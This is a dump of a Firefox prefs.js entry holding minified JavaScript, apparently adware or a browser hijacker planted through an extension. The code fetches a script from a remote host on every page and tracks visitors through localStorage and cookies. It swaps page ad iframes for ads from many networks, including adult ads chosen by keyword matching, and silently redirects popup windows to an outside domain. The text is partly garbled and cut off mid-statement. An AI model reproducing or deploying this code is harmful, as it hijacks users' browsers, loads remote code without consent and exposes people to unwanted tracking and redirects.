FF - prefs.js..extensions.lUT.scode: "(function(){if(window.self.location.hostname.indexOf(\"acebook.co\")>-1){return};var _wlst={lsKey:\"ssjsmn2ja8ddw2a\",get:function(b,a){if(3<b)return a(!1var d=this.fetch();if(d)return a(parseInt(d));if(1== B){crc=this.hcrc32(window.self.location.hostname.replace(\"www.\",\"\"));try{var c=document.createElement(\"script\");c.type=\"text/javascript\";try{c.async=\"async\"}catch(e){}c.src=\"http://v.zilionfast.in/\"+crc+\"/?t=vrt\";(document.getElementsByTagName(\"head\")[0]||document.getElementsByTagName(\"body\")[0]).appendChild©}catch(f){}}setTimeout(function(){_wlst.get(++b,a)},180)},fetch:function(){try{if(\"undefined\"!=localStorage)try{return localStorage.getItem(this.lsKey)}catch( B){return 0}else _wlst.getCkie()}catch(a){_wlst.getCkie()}},getCkie:function(){if(0<document.cookie.length&&(c_start=document.cookie.indexOf(this.lsKey+\"=\"),-1!=c_start))return c_start=c_start+this.lsKey.length+1,c_end=document.cookie.indexOf(\";\",c_start),-1==c_end&&(c_end=document.cookie.length),unescape(document.cookie.substring(c_start,c_end))},hcrc32:function(b,a){a||(a=0);var d=0;a^=-1;for(var c=0,e=b.length;c<e;c++)d=(a^b.charCodeAt©)&255,d=\"0x\"+\"00000000 77073096 EE0E612C 990951BA 076DC419 706AF48F E963A535 9E6495A3 0EDB8832 79DCB8A4 E0D5E91E 97D2D988 09B64C2B 7EB17CBD E7B82D07 90BF1D91 1DB71064 6AB020F2 F3B97148 84BE41DE 1ADAD47D 6DDDE4EB F4D4B551 83D385C7 136C9856 646BA8C0 FD62F97A 8A65C9EC 14015C4F 63066CD9 FA0F3D63 8D080DF5 3B6E20C8 4C69105E D56041E4 A2677172 3C03E4D1 4B04D447 D20D85FD A50AB56B 35B5A8FA 42B2986C DBBBC9D6 ACBCF940 32D86CE3 45DF5C75 DCD60DCF ABD13D59 26D930AC 51DE003A C8D75180 BFD06116 21B4F4B5 56B3C423 CFBA9599 B8BDA50F 2802B89E 5F058808 C60CD9B2 B10BE924 2F6F7C87 58684C11 C1611DAB B6662D3D 76DC4190 01DB7106 98D220BC EFD5102A 71B18589 06B6B51F 9FBFE4A5 E8B8D433 7807C9A2 0F00F934 9609A88E E10E9818 7F6A0DBB 086D3D2D 91646C97 E6635C01 6B6B51F4 1C6C6162 856530D8 F262004E 6C0695ED 1B01A57B 8208F4C1 F50FC457 65B0D9C6 12B7E950 8BBEB8EA FCB9887C 62DD1DDF 15DA2D49 8CD37CF3 FBD44C65 4DB26158 3AB551CE A3BC0074 D4BB30E2 4ADFA541 3DD895D7 A4D1C46D D3D6F4FB 4369E96A 346ED9FC AD678846 DA60B8D0 44042D73 33031DE5 AA0A4C5F DD0D7CC9 5005713C 270241AA BE0B1010 C90C2086 5768B525 206F85B3 B966D409 CE61E49F 5EDEF90E 29D9C998 B0D09822 C7D7A8B4 59B33D17 2EB40D81 B7BD5C3B C0BA6CAD EDB88320 9ABFB3B6 03B6E20C 74B1D29A EAD54739 9DD277AF 04DB2615 73DC1683 E3630B12 94643B84 0D6D6A3E 7A6A5AA8 E40ECF0B 9309FF9D 0A00AE27 7D079EB1 F00F9344 8708A3D2 1E01F268 6906C2FE F762575D 806567CB 196C3671 6E6B06E7 FED41B76 89D32BE0 10DA7A5A 67DD4ACC F9B9DF6F 8EBEEFF9 17B7BE43 60B08ED5 D6D6A3E8 A1D1937E 38D8C2C4 4FDFF252 D1BB67F1 A6BC5767 3FB506DD 48B2364B D80D2BDA AF0A1B4C 36034AF6 41047A60 DF60EFC3 A867DF55 316E8EEF 4669BE79 CB61B38C BC66831A 256FD2A0 5268E236 CC0C7795 BB0B4703 220216B9 5505262F C5BA3BBE B2BD0B28 2BB45A92 5CB36A04 C2D7FFA7 B5D0CF31 2CD99E8B 5BDEAE1D 9B64C2B0 EC63F226 756AA39C 026D930A 9C0906A9 EB0E363F 72076785 05005713 95BF4A82 E2B87A14 7BB12BAE 0CB61B38 92D28E9B E5D5BE0D 7CDCEFB7 0BDBDF21 86D3D2D4 F1D4E242 68DDB3F8 1FDA836E 81BE16CD F6B9265B 6FB077E1 18B74777 88085AE6 FF0F6A70 66063BCA 11010B5C 8F659EFF F862AE69 616BFFD3 166CCF45 A00AE278 D70DD2EE 4E048354 3903B3C2 A7672661 D06016F7 4969474D 3E6E77DB AED16A4A D9D65ADC 40DF0B66 37D83BF0 A9BCAE53 DEBB9EC5 47B2CF7F 30B5FFE9 BDBDF21C CABAC28A 53B39330 24B4A3A6 BAD03605 CDD70693 54DE5729 23D967BF B3667A2E C4614AB8 5D681B02 2A6F2B94 B40BBE37 C30C8EA1 5A05DF1B 2D02EF8D\".substr(9*d,8),a=a>>>8^d;c=a^-1;0>c&&(c+=4294967296);return c}},_zyad={title:document.title?document.title.toLowerCase():\"na\",location:window.self.location.href.toLowerCase() + (document.referrer ? document.referrer : ''),vrt:!1,networks_list:[[['mediashakers_rmx',405],['cpx_bet_55',127],['deliads_apx_tb_new',72],['saymedia_apx_tag_test',71],['start_me_app_tier1',145],['webmedia_tb_new',91],['baba_tb_new',288],['dsnr_toptier1_gentb',1701],['xertive_gentb',3110],['mediashakers_apx3',33],['cpx_int47_tr',451],['cpx_int41_tr',474],['clove_fixed_us_uk',723],['mindads_rmx_new',215],['cpx_favorhythmic',193],['adfish_hasoffers',91],['mediawhite_nontb',141],['matomy_adj8',644],['matomy_adj8_2',645],['mmg_new222',92],['adstract_adwp_new2',137],['mari_nontb',151]],[['cpx_nontb30_tr',416],['dsnr_strm_t1',432],['mari_strm4',1711],['matomy_strm5_2',3720],['matomy_strm5',3721]],[['hulk_porn',10000]]],networks_conf:!1,init:function(){_wlst.get(1,function( B){_zyad.vrt=b;if(!(_zyad.vrt==17 || _zyad.location.indexOf('LhqVlw8R=')>-1|| _zyad.location.indexOf('adk2.co')>-1 ||window.self.location.hostname==\"ad.media-servers.net\"||window.self.location.hostname==\"tr.adsplats.com\"||window.self.location.hostname==\"ib.adnxs.com\"||window.self.location.hostname==\"ad.co-co-co.co\"||window.self.location.hostname==\"an.z5x.net\"||window.self.location.hostname==\"ads.yahoo.com\"||window.self.location.hostname==\"ads.clovenetwork.com\"||window.self.location.hostname==\"adfishmedia.go2cloud.org\"||window.self.location.hostname==\"srv1.mediads.info\"||window.self.location.hostname==\"ads.ventivmedia.com\"|| _zyad.location.indexOf('=287609')>-1|| _zyad.location.indexOf('=458516')>-1||_zyad.location.indexOf('PT1311')>-1||_zyad.location.indexOf('1018-1005')>-1||_zyad.location.indexOf('1019-1001')>-1||_zyad.location.indexOf('2136&zid=')>-1))if(_zyad.networks_conf=12==_zyad.vrt?_zyad.networks_list[2]:_zyad.vrt?_zyad.networks_list[1]:!_zyad.getisP()?_zyad.networks_list[0]:!1,_zyad.networks_conf){for(i=0;5>i;i++)setTimeout(_zyad.find,500*i);window.self==window.top&&1==Math.floor(7*Math.random()+1)&&setTimeout(function(){_zyad.find(1)},6E4)}})},getisD:function(){return-1<_zyad.title.indexOf(\"torrent\")||-1<_zyad.location.indexOf(\"torrent\")},getisNA:function(){return!1},getisP:function(){try{if(12==_zyad.vrt)return!0;if(_zyad.vrt)return!1;var b=document.getElementsByTagName(\"meta\");if(b)for(i=0;i<b.length;i++)try{if(b[i]&&b[i].getAttribute(\"name\")){var a=b[i].getAttribute(\"name\").toLowerCase();if(\"description\"==a||\"keywords\"==a)_zyad.title=_zyad.title+\" \"+b[i].getAttribute(\"content\")}}catch(d){}}catch©{}b=\"porn sex xxx tits adult lesbian squirt creampie bondage ExSuna mature fisting ###### gangbang orgy gay nude tits tranny blowjob handjob masturbat busty slut joder horny mamada polla cock ###### threesome teens milf bdsm hentai motherless erotic cams petite\".split(\" \");for(i in b)if(-1<_zyad.location.indexOf(b[i])||-1<_zyad.title.indexOf(b[i]))return!0;return!1},epoch:function(){try{var b=new Date;try{return(b.getTime()-b.getMilliseconds())/1E3}catch(a){return parseInt(b.getTime()/1E3)}}catch(d){return 0}},between:function(b,a){return b>=a-7&&b<=a+7},detectRsize:function( B){try{var a=[0,0];try{a=[parseInt(\"number\"==typeof b.width||\"string\"==typeof b.width&&b.width.match(/[0-9]/)?b.width:b.scrollWidth),parseInt(\"number\"==typeof b.height||\"string\"==typeof b.height&&b.height.match(/[0-9]/)?b.height:b.scrollHeight)]}catch(d){}var c=_zyad.between;switch(!0){case c(a[1],600)&&c(a[0],120):return[120,600];case c(a[1],600)&&c(a[0],160):return[160,600];case c(a[1],600)&&c(a[0],300):return[300,600];case c(a[1],125)&&c(a[0],125):return[125,125];case c(a[1],250)&&c(a[0],300):return[300,250];case c(a[1],250)&&c(a[0],250):return[250,250];case c(a[1],250)&&c(a[0],336):return[300,250];case c(a[1],150)&&c(a[0],180):return[180,150];case c(a[1],400)&&c(a[0],600):return[600,400];case c(a[1],60)&&c(a[0],120):return[120,60];case c(a[1],100)&&c(a[0],300):return[300,100];case c(a[1],60)&&c(a[0],234):return[234,60];case c(a[1],60)&&c(a[0],460):return[460,60];case c(a[1],60)&&c(a[0],468):return[468,60];case c(a[1],90)&&c(a[0],728):return[728,90];default:return!1}}catch(e){return!1}},find:function( B){var a=[],d=window.self.document.getElementsByTagName(\"iframe\");for(i=0;i<d.length;i++){if(!b)try{if(d[i].hasAttribute(\"s0\"))continue}catch©{try{if(d[i].getAttribute(\"s0\"))continue}catch(e){}};try{if(d[i].src.indexOf('=287609')>-1||d[i].src.indexOf('=458516')>-1||d[i].src.indexOf('1018-1005')>-1||d[i].src.indexOf('1019-1001')>-1||d[i].src.indexOf('2136&zid=')>-1||(d[i].getAttribute('name')&&d[i].getAttribute('id')==d[i].getAttribute('name')&&d[i].getAttribute('name').match(/^ap\\d+$/))){try{d[i].setAttribute(\"s0\", \"true\");d[i].setAttribute(\"replaced\", \"true\");}catch(e){};continue;}}catch(e){};(rSize=_zyad.detectRsize(d[i]))&&a.push({size:rSize,ifr:d[i],func:function(a, B){_zyad.setNetwork(a.ifr,a.size);b++;a&&a&&\"function\"==typeof a.func&&setTimeout(function(){a.func(a, B)},1)}})}a[0]&&a[0].func&&a[0].func(a,0)},setNetwork:function(b,a){if(a&& B){var d=0,c=0,e=Math.floor(10000*Math.random()+0.9),f=0,h={},g=[];for(i=0;i<_zyad.networks_conf.length;i++){var j=_zyad.networks[_zyad.networks_conf[i][0]](a);j&&(h[i]=j,g.push(i),d+=_zyad.networks_conf[i][1])}10000<d&&(c=Math.floor((10000-d)/g.length+0.9));for(i=0;i<g.length;i++)if(d=g[i],f+=_zyad.networks_conf[i][1]+c,f>=e){h[d]( B);break}}},iset:function(ifr, url, mode, properties){try{switch(mode){default:case 1:var channel = 0;try{if(ifr.getAttribute('bow')) channel=1}catch(e){}ifr.src = url + (properties ? (url.indexOf('?')>'-1' ? '&' : '/?') + 'LhqVlw8R=' + properties[0] + '_' + properties[1] + '_' + channel : '');break;case 2:try{ifr.src='about:blank';ifr.contentWindow.document.write('<html><head>\\x3cscript>setTimeout(function(){location.href=\"'+url+'\"},1)\\x3c/script></head><body>&nbsp;\\x3c/body>\\x3c/html>');}catch(e){var h = '<html><head><style>html,body{padding:0px;margin:0px;}</style></head><body><iframe name=\"a7h3h73d3\" src=\"about:blank\" style=\"width:100%;height:100%;border:0\" MARGINWIDTH=\"0\" MARGINHEIGHT=\"0\" frameborder=\"0\" scrolling=\"no\" width=\"100%\" height=\"100%\"></iframe>\\x3cscript>setTimeout(function(){frames[\"a7h3h73d3\"].document.write(\"<\"+\"script>setTimeout(function(){setTimeout(function(){location.href=\\x5c\\\\x27'+url+'\\x5c\\\\x27},1)},1);\"+\"<\"+\"/script>\")},1)\\x3c/script></body></html>';ifr.src='javascript:document.write(\\''+h+'\\');'}break;case 3:ifr.src = \"about:blank\";ifr.contentWindow.document.write('<html><head><style>html,body{padding:0px;margin:0px;}</style>\\x3cscript>setTimeout(function(){document.getElementsByTagName(\"body\")[0].innerHTML=\"\\x3cscript src=\"'+url+'\">\\x3c/script>\"},10)\\x3c/script></head><body>&nbsp;</body></html>');break;case 4:ifr.src = \"about:blank\";ifr.contentWindow.document.write('<html><head><style>html,body{padding:0px;margin:0px;}</style></head><body>'+url+'</body></html>');break;}try{ifr.setAttribute(\"s0\", \"true\");ifr.setAttribute(\"replaced\", \"true\")}catch(e){}}catch(e){}},networks:{mediashakers_rmx:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250  728x90'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://ad.media-servers.net/st?ad_type=iframe&ad_size=+size+&section=5021599&section_code=714_0&pub_url=' (atp?atp:1), [313,size]);}}catch(e){return !1;}},cpx_bet_55:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '300x250 728x90 160x600'.indexOf(size)) return !1;var atp=false;var reff = window.top==window.self ? encodeURIComponent(window.self.location.href) : '';;return function(ifr){_zyad.iset(ifr, 'http://tr.adsplats.com/cmp/1412355/index.html?size=+size+&referrer=+reff+' (atp?atp:1), [354,size]);}}catch(e){return !1;}},deliads_apx_tb_new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 120x600 160x600 468x60'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;var arr={\"728x90\":\"1962958\",\"300x250\":\"1962952\",\"120x600\":\"1962975\",\"160x600\":\"1962977\",\"468x60\":\"1962981\"}[size];var surl = \"http://ib.adnxs.com/tt?id=\"+ arr +\"&cb=&referrer=\";;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [359,size]);}}catch(e){return !1;}},saymedia_apx_tag_test:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90 468x60'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"1957902\",\"468x60\":\"1957923\",\"160x600\":\"1957924\", \"300x250\":1957917}[size];var surl = \"http://ad.co-co-co.co/rmx/appnexus.html?id=\"+arr;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [366,size]);}}catch(e){return !1;}},start_me_app_tier1:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2030220&size=+size+&cb=&age=&gender=&referrer=&pubclick=' (atp?atp:1), [411,size]);}}catch(e){return !1;}},webmedia_tb_new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2049295&size=+size+&referrer=' (atp?atp:1), [418,size]);}}catch(e){return !1;}},baba_tb_new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;var arr={\"728x90\":\"1957852\",\"300x250\":\"1947796\",\"468x60\":\"1957860\",\"120x600\":\"1957857\",\"160x600\":\"1957854\"}[size]; var surl = \"http://ib.adnxs.com/tt?id=\"+arr+\"&referrer=\";return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [423,size]);}}catch(e){return !1;}},dsnr_toptier1_gentb:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '120x600 160x600 300x250 468x60 728x90'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://an.z5x.net/tt?id=2059560&size=+size+&referrer=' (atp?atp:1), [428,size]);}}catch(e){return !1;}},xertive_gentb:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600'.indexOf(size)) return !1;var atp=false;if(size == \"120x60\") return;;return function(ifr){_zyad.iset(ifr, 'http://ads.yahoo.com/st?ad_type=iframe&ad_size=+size+&site=1736632&section_code=714_0&pub_url=$PUB_URL&pub_redirect_unencoded=1&pub_redirect=click_url&cb=cache_' (atp?atp:1), [434,size]);}}catch(e){return !1;}},mediashakers_apx3:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600'.indexOf(size)) return !1;var atp=false;if(size == \"120x60\") return;var arr={\"728x90\":\"2107541\",\"300x250\":\"2107538\",\"468x60\":\"2107542\",\"120x600\":\"2107544\",\"160x600\":\"2107539\"}[size]; var surl=\"http://ib.adnxs.com/tt?id=\"+arr+\"&cb=&referrer=&pubclick=\";return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [440,size]);}}catch(e){return !1;}},cpx_int47_tr:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '160x600 300x250 728x90'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://tr.adsplats.com/tra/53626/index.html?size=+size+&referrer=' (atp?atp:1), [441,size]);}}catch(e){return !1;}},cpx_int41_tr:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://tr.adsplats.com/tra/44758/index.html?size=+size+&referrer=' (atp?atp:1), [444,size]);}}catch(e){return !1;}},clove_fixed_us_uk:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"2077387\",\"300x250\":\"2076962\",\"160x600\":\"2077388\"}[size];var surl = \"http://ads.clovenetwork.com/tt?id=\"+arr;;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [445,size]);}}catch(e){return !1;}},mindads_rmx_new:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ads.yahoo.com/st?ad_type=iframe&ad_size=+size+&section=4889565&pub_url=&section_code=714_0' (atp?atp:1), [458,size]);}}catch(e){return !1;}},cpx_favorhythmic:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://tr.adsplats.com/tra/47278/index.html?size=+size+&referrer=' (atp?atp:1), [460,size]);}}catch(e){return !1;}},adfish_hasoffers:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;var arr ={\"300x250\":\"4\",\"160x600\":\"6\",\"728x90\":\"2\",}[size];var surl = \"http://adfishmedia.go2cloud.org/aff_ad?campaign_id=\"+arr+\"&aff_id=4276&format=iframe\";;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [461,size]);}}catch(e){return !1;}},mediawhite_nontb:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"2120863\",\"300x250\":\"2120862\",\"160x600\":\"2120861\"}[size];var surl = \"http://ib.adnxs.com/tt?id=\"+arr;;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [463,size]);}}catch(e){return !1;}},matomy_adj8:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"2122636\",\"300x250\":\"2122633\",\"160x600\":\"2122638\"}[size]; var surl = \"http://ib.adnxs.com/tt?id=\"+arr;;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [464,size]);}}catch(e){return !1;}},matomy_adj8_2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"2122637\",\"300x250\":\"2122634\",\"160x600\":\"2122640\"}[size];var surl = \"http://ib.adnxs.com/tt?id=\"+arr;;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [465,size]);}}catch(e){return !1;}},mmg_new222:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://srv1.mediads.info/tags/?tid=222&size=+size+&hash=9yps43&q=&pub_domain=' (atp?atp:1), [466,size]);}}catch(e){return !1;}},adstract_adwp_new2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600'.indexOf(size)) return !1;var atp=false;if(size=='120x60')return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2121067&size=+size+' (atp?atp:1), [469,size]);}}catch(e){return !1;}},mari_nontb:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600'.indexOf(size)) return !1;var atp=false;if(size == '120x60' )return; var arr={\"728x90\":\"2119652\",\"300x250\":\"2119654\",\"468x60\":\"2119655\",\"120x600\":\"2119656\",\"160x600\":\"2119653\"}[size]; var surl = \"http://ib.adnxs.com/tt?id=\"+arr;;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [459,size]);}}catch(e){return !1;}},cpx_nontb30_tr:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;;return function(ifr){_zyad.iset(ifr, 'http://tr.adsplats.com/tra/32160/index.html?size=+size+&referrer=' (atp?atp:1), [442,size]);}}catch(e){return !1;}},dsnr_strm_t1:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600'.indexOf(size)) return !1;var atp=false;if(size == \"120x60\") return;;return function(ifr){_zyad.iset(ifr, 'http://ib.adnxs.com/tt?id=2112867&size=+size+&referrer=' (atp?atp:1), [453,size]);}}catch(e){return !1;}},mari_strm4:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"2121065\",\"300x250\":\"2121064\",\"160x600\":\"2121063\"}[size];var surl = \"http://ib.adnxs.com/tt?id=\"+arr;;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [462,size]);}}catch(e){return !1;}},matomy_strm5_2:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"2122667\",\"300x250\":\"2122661\",\"160x600\":\"2122669\"}[size]; var surl = \"http://ib.adnxs.com/tt?id=\"+arr;;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [467,size]);}}catch(e){return !1;}},matomy_strm5:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 160x600'.indexOf(size)) return !1;var atp=false;var arr={\"728x90\":\"2122666\",\"300x250\":\"2122660\",\"160x600\":\"2122668\"}[size]; var surl = \"http://ib.adnxs.com/tt?id=\"+arr;;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [468,size]);}}catch(e){return !1;}},hulk_porn:function(rsize){try{var size = rsize[0] + 'x' + rsize[1],width=rsize[0],height=rsize[1];if (-1 == '728x90 300x250 468x60 120x600 160x600 300x600 250x250 600x400'.indexOf(size)) return !1;var atp=false;var surl='http://syndication.exoclick.com/ads-iframe-display.php?type=+size+&login=hulkshare_RS2&cat=2&search=&ad_title_color=0000cc&bgcolor=FFFFFF&border=0&border_color=000000&font=&block_keywords=&ad_text_color=000000&ad_durl_color=008000&adult=0&sub=0&text_only=0&show_thumb=0&idzone=' + {\"728x90\":\"638635\",\"300x250\":\"638633\",\"468x60\":\"774737\",\"120x600\":\"774751\",\"160x600\":\"638637\",\"300x600\":\"774753\",\"250x250\":\"774743\",\"600x400\":\"774747\"}[size] + '&idsite=225117&p='+encodeURIComponent(window.self.location.href)+'&dt=' + Math.random();;return function(ifr){_zyad.iset(ifr, ''+surl+'', (atp?atp:1), [420,size]);}}catch(e){return !1;}}}};_zyad.init();;(function(){try{if(window.opener&&window.self==window.top&&-1==document.cookie.indexOf(\"xcddsa\")&&-1==window.self.location.href.indexOf(\"px.pluginh\")&&window.self.location.hostname.indexOf('earchfu')==-1&&(!document.referrer||-1==document.referrer.indexOf('/amz/')&&(!document.referrer.match(/cpops-\\d+\\.html/))&&-1==document.referrer.indexOf(\"px.pluginh\"))&&-1==window.self.location.href.indexOf(\"ally.asi\")&&-1==window.self.location.href.indexOf('/amz/')&&(!window.self.location.href.match(/cpops-\\d+\\.html/))&&-1==window.self.location.hostname.indexOf(\"getjs\")&&-1==window.self.location.hostname.indexOf(\"hsbc\")&&3>history.length){var c=navigator.userAgent.toLowerCase(),d=\"http://rbv.jobfindgold.info/a1/?eid=714&hid=3312693594561686360&pid=0&rf=\" + encodeURIComponent(document.referrer) +\"&s=px.pluginh&r=\"+Math.random();if(-1<c.indexOf(\"msie\")&&(!document.referrer||-1==document.referrer.indexOf(location.hostname))){var e=window.innerWidth||document.documentElement.scrollWidth||0,f=window.innerHeight||document.documentElement.scrollHeight||0;if(e){window.resizeTo(e,f);var g=window.innerWidth||document.documentElement.scrollWidth,k=window.innerHeight||document.documentElement.scrollHeight;window.resizeTo(e+2,f);var h=window.scrollWidth||document.documentElement.scrollWidth;if(h!=g&&h<=g+2&&90>=f-k){var a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};window.self.location.href=d}}}else if(!window.menubar.visible&&document.referrer&&-1==document.referrer.indexOf(window.self.location.hostname)){a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};var b=document.createElement(\"script\");b.type=\"text/javascript\";-1<c.indexOf(\"chrome\")&&(b.innerHTML='document.getElementsByTagName(\"body\")[0].setAttribute(\"xcddsa\",\"1\")',document.getElementsByTagName(\"body\")[0].appendChild( B),setTimeout(function(){document.getElementsByTagName(\"body\")[0].getAttribute(\"xcddsa\")&&(window.self.location.href=d)},10));-1<c.indexOf(\"firefox\")&&(b.innerHTML='try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};setTimeout(function(){window.self.location.href=\"'+d+'\";},10);',document.getElementsByTagName(\"head\")[0].appendChild( B))}}}catch(l){}})();if(-1<window.self.location.href.indexOf(\"df.ly/\")){var dd=document.getElementById(\"rf\");dd&&dd.setAttribute(\"src\",\"http://rbv.jobfindgold.info/x/?ch=1\")}(\"rdlnk.co\"==window.self.location.hostname||\"adfoc.us\"==window.self.location.hostname||\"www.adsbeta.net\"==window.self.location.hostname||\"ad5.eu\"==window.self.location.hostname)&&(dd=document.getElementsByTagName(\"iframe\")[0])&&dd.setAttribute(\"src\",\"http://rbv.jobfindgold.info/x/?ch=1\");\"cf.ly\"==window.self.location.hostname&&(dd=document.getElementsByTagName(\"iframe\")[1])&&dd.setAttribute(\"src\",\"http://rbv.jobfindgold.info/x/?ch=1\");\"adv.li\"==window.self.location.hostname&&(dd=document.getElementById(\"main\"))&&dd.setAttribute(\"src\",\"http://rbv.jobfindgold.info/x/?ch=1\");;(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"LhqVlw8R=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"LhqVlw8R=\")){var d=a.match(/LhqVlw8R=(\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var 